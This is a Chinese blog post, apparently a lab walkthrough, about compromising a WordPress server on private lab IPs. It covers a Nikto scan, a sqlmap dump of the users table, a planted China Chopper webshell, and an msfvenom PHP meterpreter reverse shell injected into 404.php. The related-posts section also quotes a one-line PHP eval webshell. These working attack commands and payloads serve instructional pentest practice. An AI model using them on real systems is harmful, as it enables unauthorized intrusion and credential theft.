使用反弹木马进行提权

最新推荐文章于 2023-05-30 08:40:54 发布
最新推荐文章于 2023-05-30 08:40:54 发布
阅读量4.1k 收藏 9
点赞数 7
文章标签: 网络 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/forget_mt/article/details/121507276
版权

渗透机:kail  ip:172.16.5.6

靶   机:linux ip:172.16.5.7

客户端:windows XP ip: 172.16.5.128

通过Nikto对服务器80端口进行扫描:

nikto -host http://172.16.1.200 

发现了login.php文件与phpmyadmin/目录

所以直接在浏览器中访问login.php

sqlmap -u “http://172.16.5.7/login.php” --forms --level 3 -D wordpress8080 -T users --dump

 

从这里我们就知道了用户名admin与密码SuperSecretPassword登录后台

接下来利用WordPress进行提权操作,基本上提权的方式有三种:

1.将一句话写到一个文件夹下并压缩成.zip格式上传

2.找到能编辑的php文件,将一句话写进去,然后使用菜刀来连接该一句话木马

3.通过php shell反弹木马并结合Meterpreter实现反弹连接

这里我们尝试以读写的方式生成一个shell.php文件。 

然后使用windows里的中国菜刀来连接木马的地址

 

 利用msf生成一个php格式的反弹木马脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.1.100 LPORT=886 -f raw > shell.php

打开msfconsole控制台

先不着急运行模块,先将木马源码复制出来上传到靶机,替换掉服务器的404.php页面内容,再次访问http://172.16.5.7:8080/wordpress/404.php来触发php反弹木马。

运行模块,成功进入后渗透。

 

 

陳小陌
关注
  • 7
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
反弹木马原理_Metasploit -- 木马生成原理和方法
weixin_39986027的博客
12-22 1102
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。---- 网易云热评一、生成方式:利用msf模块中的msfvenom模块二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马程序,并在目标...
msf渗透练习-php后门反弹
weixin_49349476的博客
06-09 2551
php后门反弹,就是通过php的后门文件,对目标进行操控。本次使用msf完成(仅供学习)
2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与防御
weixin_30693683的博客
05-21 343
2018-2019-2 20165314『网络对抗技术』Final:反弹木马的剖析与防御 实践规划 通过自学,掌握木马的攻击原理,初步实现一个反弹木马,主要分为服务器端(靶机)、客户端(攻击者)和一个代理服务器端,其中客户端包括控制程序和配置程序两部分,代理服务器端供转发数据功能以防止反跟踪。 我要开始赶鸭子上架了 初步规划做一个针对windows的远程控制型第六代木马,利用网页脚本植入,不采用...
生成木马反弹和简单的Windows
BRMTSW的博客
03-01 637
生成木马反弹和简单的Windows
Web安全-一句话木马
liuwei0376的专栏
08-20 4027
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而获取系统限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
系统漏洞利用与
JJH2724719395的博客
05-30 1180
4.对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前限的用户名作为FLAG(形式:[用户名])交;7.利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])交;8.利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])交。2.通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])交;服务器场景用户名:未知 密码:未知。
webshell、一句话木马限问题
m0_46736332的博客
09-11 2643
webshell一句话木马限大小是由什么决定的。 webshell的限由不同级别的用户去运行容器所决定! 通俗来说,如果是管理员运行web服务器,那么上传的木马被容器解析之后,它(shell)的限就是管理员的限,如果是普通用户运行web服务器,那么上传的木马被容器解析之后,它(shell)的限就是普通用户的限。
防溢出攻击解决办法
05-11
本文将为大家介绍在Microsoft系列(Win2k Win2k3)SERVER中如何简单快速的解决诸如反弹木马、Overflow溢出、限、反弹Shell攻击类的安全威胁之详细防范设置步骤;读完本文,您将可以使您服务器免去被溢出、升...
记一次HW实战笔记 _ 艰难的爬坑1
08-03
在确定系统存在可利用的漏洞后,攻击者尝试使用`windows-exploit-suggester.py`工具进行补丁漏洞审计,以找到可能的方法。然而,使用Metasploit框架内置的模块(如MS16-016)并未成功。 接下来,攻击者转而...
2010最新php免杀木马乱码优化版下载
02-24
例如Serv-U本地利用代码,适用于 6.4以及一下版本,以及MYSQL反弹SHELL等。 6、超强执行命令功能。 7、简化一些PHP环境变量显示。 8、大大高各个操作的效率,尤其是文件管理。 加快多文件目录的输出速度...
渗透入门Mr-robott靶机练习.doc
07-09
渗透测试靶机Mr-Robot实践指南 渗透测试是一种网络安全测试,旨在...本文供了一个完整的渗透测试流程,从网络扫描到shell反弹木马上传和。通过实践Mr-Robot靶机,初学者可以快速掌握渗透测试的技术和工具。
NC反彈SHELL教學
05-13
【描述】:“NC反彈SHELL 教學加上資源檔、權工具”表明这个教程不仅教授如何使用nc创建反弹shell,还供了相关的辅助资源和工具。是指在获得基本访问限后,进一步升到管理员或更高限的过程,这...
06_Me and My Girlfriend:信息收集、漏洞利用、基础姿势总结回顾
Hack word
04-19 360
总体来说,在利用nmap进行扫描以后发发现主机,正对主机ip进行端口与服务的扫描,发现网站开放的80端口,访问发现没有任何功能,尝试gobuster与工具的使用扫描目录与敏感文件,但是无可利用信息,查看网页源码发现暴出来的信息use x-forwarded-for,说是必须设置本地的请求头,于是用burp进行设置,进入到主界面,根据相关的功能进行测试,注册后发现该网站可以水平越访问,并且在网页表单中就存放着密码,经过挨个测试成功ssh登录到目标靶机,在这个时候针对该账户有的限,账户下面的子文件夹进行
木马程序攻击+利用Windows内核漏洞
m0_71745258的博客
01-22 3554
再次声明,此学习路线主打就业方向,如果只是感兴趣,想成为什么黑客的朋友可以划走了!网络安全≠黑客很多人上来就说想做想入行网络安全,但是连方向都没搞清楚就开始学习,最终也只是会无疾而终!黑客是一个大的概念,里面包含了许多方向,不同的方向需要学习的内容也不一样。网络渗透、逆向分析、漏洞攻击、内核安全、移动安全、破解PWN等众多子方向。今天的这篇,主要是针对网络渗透方向,其他方向仅供参考,学习路线并不完全一样,有机会的话我再单独梳理。
(48.1)【WAF绕过-限控制】webshell、小马、限脚本、限工具
05-19 1251
限控制】脚本、木马、工具
暗月靶场项目四(一句话木马上线msf)
qq_44657899的博客
02-14 1933
文章目录网络拓扑图信息搜集主机发现端口扫描绑定域名设置本地网关wfuzz子域名搜集dedecms内容管理系统漏洞检测 网络拓扑图 信息搜集 主机发现 nmap -sn 192.168.170.0/24 netdiscover -i eth0 -r 192.168.170.0/24 端口扫描 nmap -p 1-65535 -sS 192.168.170.141 绑定域名 # kali vim /etc/hosts 添加 192.168.170.141 www.cc123.com # windwo
MSF模拟渗透测试之一句话木马拿shell
lza20001103的博客
04-08 3831
MSF模拟渗透测试之一句话木马拿shell
PHP 一句话木马 @eval($_POST[‘hack‘]); 语句解析及靶机演示
热门推荐
百彦子烨的博客
11-10 2万+
该文章对PHP一句话木马 @eval($_POST['hack']); 语句进行了详细解析并进行了简单的靶机演示该木马利用操作
php服务器,服务器
weixin_27945229的博客
03-13 464
当拿到WebShell 之后,下⼀步⼲什么?升通过一些最初的漏洞利⽤途径,攻击者将获得⼀定的访问限。接着,攻击者将逐步探查其破坏的系统来获得⽐最初更多的限,以期望从其他账户访问敏感信息,甚⾄获得对整个系统的完全管理控制。当攻击者以这种⽅式扩⼤其最初的未经授访问的限时,将其⾏为称为升攻击。简单来说,就是获取⽐最初更多的限,甚⾄系统限。⽔平升(越)我们假设攻击者已经获得...
反弹shell和木马的关系
最新发布
09-03
反弹shell通常是通过操纵网络连接进行的,攻击者利用漏洞或后门将恶意代码注入目标系统,然后通过网络连接将目标系统上的控制反向连接回攻击者的系统。 而"木马"是指一种隐藏在正常程序或文件中的恶意软件,它...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值